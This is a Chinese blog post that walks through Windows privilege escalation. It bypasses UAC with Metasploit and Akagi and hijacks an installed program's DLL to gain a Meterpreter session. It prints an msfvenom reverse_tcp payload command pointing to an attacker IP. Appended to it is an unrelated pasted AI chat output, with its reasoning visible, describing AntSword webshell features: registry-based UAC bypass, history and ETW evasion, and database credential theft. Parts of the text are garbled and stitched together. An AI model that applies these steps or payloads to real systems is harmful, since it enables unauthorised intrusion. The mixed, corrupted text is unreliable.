Windows提权&BypassUAC&Dll劫持

本文介绍了如何在Windows10环境中通过MSF和Akagi工具绕过UAC,以及如何使用DLL劫持技术在Web权限下获取更高权限。作者详细描述了从生成后门文件、上传、提权到利用DLL文件替换实现最终目标的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

此文章仅用于学习交流,作者不为此承担任何责任,一切违法活动造成后果自负。

一:环境

        win10+开启了UAC(默认开启)

        win10+web+安装了一些程序,运行时会加载dll

二:BypassUac提权

        UAC全称为 User Account Control,用户账户控制,在win7以后的产品都是有这个东西的。这个东西就是在我们打开一些程序时候,会弹出一些提示。

        思考:当我们取得shell后,我们要运行一些程序,但是打开的时候我们在shell中看不到提示,所以我们就要绕过UAC,使得直接就可以运行程序。

MSF+Akagi绕过UAC

        我们首先使用msf生成一个后门文件,上传到被攻击机中,模拟已经上线。

         生成后门程序。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.246.128 LPORT=4444 -f exe -o f.exe

        上传到被攻击机

        设置msf监听。

        上线msf,查看当前权限为administrators,我们提权到system。

        我们使用自动提权getsystem,发现直接报错,提不上

        其实到这里我们可以用msf自带的模块去绕过UAC,但是我自己尝试了很多个都是没有session的产生也不知道为啥。

        所以我们使用MSF+Akagi来绕过UAC

        Akagi为编译好的UACME项目

        UACME项目地址: https://github.com/hfiref0x/UACME

        我们提前把Akagi.exe上传到被攻击机。

        然后在msf中使用它去执行msf的后门文件,同时我们再开一个msf监听。

        Akagi64.exe使用命令:

                                             Akagi64.exe 绕过方法编号   #执行system权限的cmd

                                              Akagi64.exe 绕过方法编号  后门地址  #运行指定的程序

        可以看到新开的MSF上线了。

        我们直接提权成功。

    

二:DLL劫持

        我们首先模拟取得了web权限,发现c盘下安装的ftp软件

        如果说web权限对其他目录没有RW权限,这个dll劫持就不会成功。

        我们通过信息搜集找到了版本信息,在自己电脑上下载此程序。

        我们下载之后使用火绒剑进行分析,看程序在执行时候加载了什么dll。

        系统文件我们不能更改,我们只能利用数字签名文件或者未知文件。

        然后我们再用工具验证一下,可以看到他让我们尝试。

        使用msf生成一个dll文件,上传到服务器,替换原来的dll文件。

        上传替代原来的dll文件,这里我把原来dll文件名改成了321,我们上传的替代原来的。

        然后msf起一个监听,在被攻击机中重新运行程序。

        此时msf就上线了,我们msf生成的dll文件在程序启动时被启用了就。

最后:

        一个姑娘,如果有被人喜欢,而且那个人喜欢的干干净净,怎么都是一件好事!

<think>嗯,用户询问的是蚁剑的四个核心功能模块:文件管理、数据库操作、绕过UAC和虚拟终端。需要结合专业渗透测试工具的知识来回答,但要注意强调合法使用原则。 用户之前讨论过Shiro反序列化漏洞,现在突然转向渗透测试工具功能,可能是想了解攻击面扩展或防御措施。不过当前问题很明确是工具功能解析,需聚焦技术细节。 关于文件管理模块,蚁剑的实现类似FTP客户端,但支持高级功能如编辑二进制文件。数据库操作模块的关键在于支持多种数据库协议转换,这点需要突出。绕过UAC其实依赖的是系统漏洞或配置缺陷,回答时要避免教唆语气。虚拟终端部分要强调其与系统原生终端的差异。 注意到引用[1]到蚁剑的合法性要求,这很重要,必须在每个功能模块说明后都强调合法使用。技术上可以补充些实现原理,比如绕过UAC的常见技术如DLL劫持或计划任务滥用,但不必展开具体攻击步骤。 最后生成的三个问题要延续工具功能主题:检测方法对应防御,功能扩展考虑实际需求,限维持则是渗透测试的关键阶段。这样既能解答当前问题,又引导用户思考防御视角。</think>以下是蚁剑(AntSword)核心功能模块的详细解析,涵盖文件管理、数据库操作、绕过UAC及虚拟终端功能: --- ### 一、文件管理模块 蚁剑通过Webshell实现远程文件系统的完全控制: 1. **基础操作** - 可视化目录树浏览、文件上传/下载(支持断点续传) - 文件编辑(文本/十六进制编辑器)、重命名、删除、限修改(如Linux的`chmod`) - 实时搜索(支持正则表达式匹配文件名和内容)[^1] 2. **高级功能** - **压缩解压**:支持ZIP/TAR/GZ等格式的打包与解包 - **哈希计算**:快速获取文件的MD5/SHA1等哈希值 - **远程编辑**:直接修改服务器配置文件(如`web.config`、`.htaccess`) ```python # 示例:蚁剑通过Webshell执行文件下载的底层逻辑 webshell.execute("file_put_contents('malware.zip', base64_decode('UEsDBBQ...'))"); ``` --- ### 二、数据库操作模块 支持主流数据库的直连管理: | 数据库类型 | 功能亮点 | 关键技术实现 | |------------|------------------------------|------------------------------| | MySQL | 可视化SQL执行、数据导出为CSV | `mysqli`/`PDO`扩展调用 | | MSSQL | 执行存储过程、XP_CMDSHELL调用| `sqlsrv_connect()`连接 | | Oracle | PL/SQL调试、表空间管理 | OCI8接口 | | SQLite | 嵌入式数据库直接读写 | `sqlite3_open()`操作 **典型场景**: - 执行SQL语句注入攻击后的数据导出 - 通过数据库写Webshell(如MySQL的`INTO OUTFILE`) - 数据库凭据取(从配置文件中获取连接信息)[^1] --- ### 三、绕过UAC(用户账户控制) 针对Windows系统的升技术: 1. **技术原理** - 利用Windows白名单程序(如`fodhelper.exe`)的自动机制 - 修改注册表劫持COM对象(如`HKCU\Software\Classes\CLSID`注入) 2. **蚁剑实现方式** - 自动生成PowerShell脚本,通过Webshell执行 - 利用`cmstp.exe`(微软连接管理器)绕过UAC ```powershell # 示例:通过注册表劫持绕过UAC New-Item -Path "HKCU:\Software\Classes\CLSID\{...}\InprocServer32" -Force Set-ItemProperty -Path "..." -Name "(Default)" -Value "C:\payload.dll" ``` --- ### 四、虚拟终端(Virtual Terminal) 模拟系统Shell环境的核心模块: - **跨平台支持**: - Windows:调用`cmd.exe`/`powershell.exe` - Linux:基于`/bin/bash`或`/bin/sh` - **核心特性**: - 实时交互式命令执行(支持管道符`|`和重定向`>`) - 伪终端(PTY)支持(解决Linux系统无TTY的问题) - 会话保持(后台维持Shell连接) - **安全绕过能力**: - 禁用历史记录(Linux:`unset HISTFILE`) - 绕过命令审计(如Windows ETW绕过) --- ### 五、防护建议(针对上述功能) 1. **服务器加固**: - 禁用危险函数(如PHP的`system()`、`exec()`) - 文件限最小化(限制`www-data`用户写入限) 2. **入侵检测**: - 监控异常进程(如`powershell`执行Base64命令) - 审计注册表敏感路径修改行为 3. **应用层防护**: - Webshell指纹识别(使用RASP或WAF) - 数据库操作行为审计(如异常的`INTO OUTFILE`语句) > **重要声明**:蚁剑仅限合法授场景使用(如渗透测试、教育研究),禁止未授入侵[^1]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值